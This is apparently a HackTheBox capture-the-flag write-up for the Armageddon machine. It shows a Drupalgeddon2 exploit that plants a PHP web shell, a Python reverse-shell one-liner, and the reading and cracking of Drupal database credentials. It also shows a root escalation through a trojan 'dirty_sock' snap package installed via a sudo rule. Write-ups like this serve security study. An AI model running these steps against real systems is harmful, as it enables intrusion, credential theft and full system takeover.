Armageddon - [HTB]

Cover Image for Armageddon - [HTB]

Table of Contents


    Armageddon is a CentOs easy machine from HackTheBox where you will have to exploit a famous vulnerable CMS. Then, will have to crack a credential stored in the CMS database to become brucetherealadmin. Finally, you will have to install a trojan snap package in order to trigger the snap install hook, obtaining a new account with root privileges.


    As always let's begin looking for every opened port in the machine with nmap.

    kali@kali:~/Documents/HTB/Armageddon$ sudo nmap -sS -n -p- -T5 -oN AllPorts.txt
    [sudo] password for kali: 
    Starting Nmap 7.91 ( ) at 2021-03-29 04:26 EDT
    Warning: giving up on port because retransmission cap hit (2).
    Nmap scan report for
    Host is up (0.037s latency).
    Not shown: 65533 closed ports
    22/tcp open  ssh
    80/tcp open  http
    Nmap done: 1 IP address (1 host up) scanned in 108.66 seconds

    There are just two available services (SSH and HTTP) a deeper scan may provide more information.

    kali@kali:~/Documents/HTB/Armageddon$ sudo nmap -sC -sV -n -p22,80 -oN PortsInDepth.txt
    Starting Nmap 7.91 ( ) at 2021-03-29 04:32 EDT
    Nmap scan report for
    Host is up (0.040s latency).
    22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
    |   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
    |_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
    80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    |_http-generator: Drupal 7 (
    | http-robots.txt: 36 disallowed entries (15 shown)
    | /includes/ /misc/ /modules/ /profiles/ /scripts/ 
    | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
    | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
    |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
    |_http-title: Welcome to  Armageddon |  Armageddon
    Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 10.67 seconds

    AS we can see there is a robots.txt file composed of several not indexed URLs. Nonetheless, this will not help us at all in order to exploit the machine.

    The web page seems pretty simple and there is nothing but a login pane.

    Armageddon web page

    Looking at its technology we can see that uses Drupal 7 as CMS.

    Armageddon wappalyzer


    This CMS has an associated exploit named Drupalgeddon, pretty similar to the machine name.

    Using the exploit we can retrieve a shell as apache.

    kali@kali:$ ruby drupalgeddon2.rb
    [*] --==[::#Drupalggedon2::]==--
    [i] Target :
    [+] Found  :    (HTTP Response: 200)
    [+] Drupal!: v7.56
    [*] Testing: Form   (user/password)
    [+] Result : Form valid
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
    [*] Testing: Clean URLs
    [!] Result : Clean URLs disabled (HTTP Response: 404)
    [i] Isn't an issue for Drupal v7.x
    [*] Testing: Code Execution   (Method: name)
    [i] Payload: echo IVOJOYFG
    [+] Result : IVOJOYFG
    [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
    [*] Testing: Existing file   (
    [!] Response: HTTP 200 // Size: 6.   ***Something could already be there?***
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
    [*] Testing: Writing To Web Root   (./)
    [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
    [+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
    [+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
    [i] Fake PHP shell:   curl '' -d 'c=hostname'
    armageddon.htb>> id
    uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

    Note: If you can not execute the script, maybe is due to the highline plugin, which must be installed. In order to do so, execute the following command.

    gem install highline

    Because Drupalgeddon doesn’t provide an interactive shell, we can use python and netcat to obtain one.

    armageddon.htb>> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

    Privilege escalation 1

    We can read the mysql database credential from the settings.php Drupal file.

    sh-4.2$ cat /var/www/html/sites/default/settings.php
    $databases = array (                      
      'default' =>                           
      array ( 
        'default' =>                         
        array (      
          'database' => 'drupal',  
          'username' => 'drupaluser',
          'password' => 'CQHEy@9M*m23gBVj',       
          'host' => 'localhost',                 
          'port' => '',         
          'driver' => 'mysql',               
          'prefix' => '',                             

    Using the credential, we can get the databases users and hashes.

    sh-4.2$ mysql -u drupaluser -p"CQHEy@9M*m23gBVj" -e "use drupal; select name,pass from users;"
    name                    pass
    brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

    Using Rockyou we can retrieve the password for the system user brucetherealadmin.

    kali@kali:$ john hash.txt -w /usr/share/wordlists/rockyou.txt --format=Drupal7
    Using default input encoding: UTF-8
    Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
    Cost 1 (iteration count) is 32768 for all loaded hashes
    Will run 8 OpenMP threads
    Proceeding with single, rules:Single
    Press 'q' or Ctrl-C to abort, almost any other key for status
    Almost done: Processing the remaining buffered candidate passwords, if any.
    Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
    booboo           (?)
    1g 0:00:00:00 DONE 2/3 (2021-03-27 22:49) 5.555g/s 888.8p/s 888.8c/s 888.8C/s joshua..bradley
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed

    Now, we can use SSH in order to obtain the user flag.

    [brucetherealadmin@armageddon ~]$ wc -c user.txt 
    33 user.txt

    Privilege escalation 2

    Using sudo we can see that we can execute the command /usr/bin/snapd install as root.

    [brucetherealadmin@armageddon ~]$ sudo -l
    Matching Defaults entries for brucetherealadmin on armageddon:
        !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
        LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
    User brucetherealadmin may run the following commands on armageddon:
        (root) NOPASSWD: /usr/bin/snap install *

    Hence, we can craft a snap package that uses the install hook to create a new account with root privileges. However, there is no need to create any; we can obtain one from the following GitHub repository.

    Inside the code you can find the trojan snap. In order to turn it into a file, you need to execute the following command. Then, you only need to install it.

    [brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install --devmode malware.snap 
    dirty-sock 0.1 installed

    This snap package creates a new system user with the following credential dirty_sock:dirty_sock. This user can use sudo with any command. Hence, we can become root, obtaining the root flag.

    [brucetherealadmin@armageddon tmp] sudo /usr/bin/snap install --devmode lol.snap
    [brucetherealadmin@armageddon tmp]$ su dirty_sock
    Password: dirty_sock
    [dirty_sock@armageddon tmp]$ sudo su
    [sudo] password for dirty_sock: dirty_sock
    [root@armageddon tmp]# wc -c /root/root.txt 
    33 /root/root.txt